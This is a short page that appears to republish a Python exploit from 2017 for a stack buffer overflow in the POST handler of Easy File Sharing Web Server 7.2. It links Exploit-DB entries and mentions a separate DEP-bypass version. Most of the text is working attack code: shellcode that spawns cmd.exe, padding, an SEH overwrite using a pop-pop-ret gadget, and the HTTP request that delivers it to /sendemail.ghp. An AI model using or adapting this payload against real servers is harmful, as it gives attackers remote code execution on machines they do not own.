Original code: https://www.exploit-db.com/exploits/42165/
Update(Published: 2017-06-15)
bl4ck h4ck3r wrote a better exploit with DEP bypass 🙂
https://www.exploit-db.com/exploits/42186/ # Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP) # Exploit Author: bl4ck h4ck3r # Software Link: http://www.sharing-file.com/efssetup.exe # Version: Easy File Sharing Web Server v7.2 # Tested on: Windows XP SP2, Windows 2008 R2 x64
No DEP bypass
#!/usr/bin/env python ################################## # 2017/6/14 Chako # # Tested on: Windows XP SP3 EN # # Original code: https://www.exploit-db.com/exploits/42165/ # Vulnerability discovered by : Touhid M.Shaikh # EFS Web Server 7.2 POST HTTP Request Buffer Overflow ################################## import httplib #len 26 shellcode = ("\x8b\xec\x55\x8b\xec\x68\x65\x78\x65" "\x2F\x68\x63\x6d\x64\x2e\x8d\x45\xf8" "\x50\xb8\xc7\x93\xc2\x77\xff\xd0") #4072 # SEH record (nseh field) at 0x01be71b8 overwritten with normal pattern : # 0x66463366 (offset 4060), followed by 79 bytes of cyclic data after the # handler junk = "\x41" * 4060 nseh = "\xEB\x06\x90\x90" #0x10012f3b : pop esi # pop ebx # ret | ascii {PAGE_EXECUTE_READ} [ImageLoad.dll] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, # v-1.0- (C:\EFS Software\Easy File Sharing Web Server\ImageLoad.dll) seh = "\x3B\x2F\x01\x10" #esi #83 nop = "\x90" * 57 bof = junk + nseh + seh + shellcode + nop httpServ = httplib.HTTPConnection("192.168.136.129", 80) httpServ.connect() httpServ.request('POST', '/sendemail.ghp', 'Email=%s&getPassword=Get+Password' % bof) response = httpServ.getresponse() httpServ.close()